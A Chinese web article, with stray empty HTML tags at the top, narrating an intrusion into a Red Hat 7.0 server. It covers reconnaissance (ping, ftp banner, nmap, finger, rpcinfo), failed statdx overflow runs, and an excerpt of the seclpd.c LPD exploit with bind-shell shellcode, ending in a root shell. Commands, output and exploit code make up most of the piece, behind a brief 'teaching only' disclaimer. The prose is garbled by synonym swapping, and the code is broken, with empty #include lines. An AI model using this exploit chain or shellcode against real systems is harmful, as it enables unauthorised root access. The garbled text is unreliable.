<fieldset id='2rvc'></fieldset>
        1. <dl id='2rvc'></dl>
        2. <tr id='2rvc'><strong id='2rvc'></strong><small id='2rvc'></small><button id='2rvc'></button><li id='2rvc'><noscript id='2rvc'><big id='2rvc'></big><dt id='2rvc'></dt></noscript></li></tr><ol id='2rvc'><table id='2rvc'><blockquote id='2rvc'><tbody id='2rvc'></tbody></blockquote></table></ol><u id='2rvc'></u><kbd id='2rvc'><kbd id='2rvc'></kbd></kbd>
          <acronym id='2rvc'><em id='2rvc'></em><td id='2rvc'><div id='2rvc'></div></td></acronym><address id='2rvc'><big id='2rvc'><big id='2rvc'></big><legend id='2rvc'></legend></big></address>
          <span id='2rvc'></span>

          <ins id='2rvc'></ins>

          <code id='2rvc'><strong id='2rvc'></strong></code>
          <i id='2rvc'><div id='2rvc'><ins id='2rvc'></ins></div></i>
        3. <i id='2rvc'></i>

            加强安全:看清黑客怎样入侵linux

            • 时间:
            • 浏览:8
            • 来源:124软件资讯网

              此文的目的不在于教人入侵  ,而是为了提高自身的手艺和增强网络治理员的宁静提防意识 。仅此而已!粗心大意的网络治理员应该明确:由于你们一个小小的操作失误可能会导致整个网络周全陷落!本文主要是围绕LPD:网络打印服务的攻击而举行的  。

                首先确定目的 ,假设是:www.XXX.com

                先让俺看看是不是连得上:

              以下是引用片断:
               C:\ping www.XXX.com
                Pinging www.XXX.com[202.106.184.200] with 32 bytes of data:
                Reply from 202.106.184.200: bytes=32 time=541ms TTL=244
                Reply from 202.106.184.200: bytes=32 time=620ms TTL=244
                Reply from 202.106.184.200: bytes=32 time=651ms TTL=244
                Reply from 202.106.184.200: bytes=32 time=511ms TTL=244
                Ping statistics for 202.106.184.200:
                Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
                Approximate round trip times in milli-seconds:
                Minimum = 511ms, Maximum = 651ms, Average = 580ms
                嘻嘻—不光连得上 ,速率还不错……
                先telnet看看banner:
                C:\>telnet www.XXX.com


              遗失对主机的毗连  。
                再试试ftp,

              以下是引用片断:
              C:\>ftp www.XXX.com
                Connected to www.fbi.gov.tw.
                220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.
                User (www.XXX.com:(none)):


              wu-2.6.1看来有点眉目了 。这台机械像是RedHat7.0!首先必须确认一下 ,连上俺的跳板:
              以下是引用片断:
               C:\>telnet xxx.xxx.xxx.xxx
                Red Hat Linux release 7.0 (Guinness)
                Kernel 2.2.16-22smp on an i686
                login: fetdog
                Password:
                bash-2.04$


              拿nmap扫描器 ,看看其中的玄妙~~~


              以下是引用片断:
               bash-2.04$nmap -sT -O www.XXX.com
                Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
                WARNING! The following files exist and are readable: /usr/local/sha
                -services and ./nmap-services. I am choosing /usr/local/share/nmap/
                s for security reasons. set NMAPDIR=. to give priority to files in
                irectory
                Interesting ports on (www.XXX.com):
                (The 1520 ports scanned but not shown below are in state: closed)
                Port State Service
                25/tcp open smtp
                79/tcp open finger
                80/tcp open http
                111/tcp open sunrpc
                113/tcp open auth
                443/tcp open https
                513/tcp open login
                514/tcp open shell
                515/tcp open printer
                587/tcp open submission
                1024/tcp open kdm
                TCP Sequence Prediction: Class=random positive increments
                Difficulty=3247917 (Good luck!)
                Remote operating system guess: Linux 2.1.122 - 2.2.16
                Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds


              打开的端口还挺多  ,这意味着入侵的可能性增添  。79/tcp open finger  ,先看看这个  ,不外linux没有finger用户列表这个毛病  。

              以下是引用片断:
               bash-2.04$finger @www.XXX.com
                [www.XXX.com]
                No one logged on.


              再看看111/tcp open sunrpc  。迩来rpc毛病流行  ,不知道RH7这个东东会不会有?先看看再说!
              以下是引用片断:
               bash-2.04$rpcinfo -p www.XXX.com
                program vers proto port service
                100000 2 tcp 111 rpcbind
                100000 2 udp 111 rpcbind
                100021 1 udp 1024 nlockmgr
                100021 3 udp 1024 nlockmgr
                100024 1 udp 1025 status
                100024 1 tcp 1024 status


              看来有rpc.statd服务 。来看看能不能远程溢出拿个rootshell  。
              以下是引用片断:
               bash-2.04$./statdx -h
                statdx by ron1n
                Usage: stat [-t] [-p port] [-a addr] [-l len]
                [-o offset] [-w num] [-s secs] [-d type]
                -t attack a tcp dispatcher [udp]
                -p rpc.statd serves requests on [query]
                -a the stack address of the buffer is
                -l the length of the buffer is [1024]
                -o the offset to return to is [600]
                -w the number of dwords to wipe is [9]
                -s set timeout in seconds to [5]
                -d use a hardcoded
                Available types:
                0 Redhat 6.2 (nfs-utils-0.1.6-2)
                1 Redhat 6.1 (knfsd-1.4.7-7)
                2 Redhat 6.0 (knfsd-1.2.2-4)
                看来并不支持RH7  。照旧继续实验  ,把0-2所有试试看再说!start……
                bash-2.04$stat -d 0 www.XXX.com
                buffer: 0xbffff314 length: 999 (+str/+nul)
                target: 0xbffff718 new: 0xbffff56c (offset: 600)
                wiping 9 dwords
                Failed - statd returned res_stat: (failure) state: 21
                受挫  ,再试……
                bash-2.04$stat -d 1 www.XXX.com
                buffer: 0xbffff314 length: 999 (+str/+nul)
                target: 0xbffff718 new: 0xbffff56c (offset: 600)
                wiping 9 dwords
                Failed - statd returned res_stat: (failure) state: 21



              一样``继续

              以下是引用片断:
               bash-2.04$stat -d 1 www.XXX.com
                buffer: 0xbffff314 length: 999 (+str/+nul)
                target: 0xbffff718 new: 0xbffff56c (offset: 600)
                wiping 9 dwords
                Failed - statd returned res_stat: (failure) state: 21


              rpc.statd行不通 ,想想RH7应该有个远程溢出  ,似乎是lp服务造成的  。“seclpd.c”应该是这个东东了 。
                —————以下代码仅供教学使用  ,决不能用来举行恶意攻击—————

                

              以下是引用片断:
               
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #include
                #define ADDRESS_BUFFER_SIZE 32+4
                #define APPEND_BUFFER_SIZE 52
                #define FORMAT_LENGTH 512-8
                #define NOPCOUNT 200
                #define SHELLCODE_COUNT 1030
                #define DELAY 50000
                #define OFFSET_LIMIT 5000
                char shellcode[] =
                "\x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80"
                "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
                "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
                "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
                "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
                "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
                "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
                "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
                "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


              brute暴力破解  。等上5-8分钟左右  ,效果出来了  。

              以下是引用片断:
               - [+] shell located on www.XXX.com
                - [+] Enter Commands at will
                Linux XXX.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown
                uid=0(root) gid=7(lp)


              uid=0(root权限) ,现在可以近一步入侵!但不要做坏事!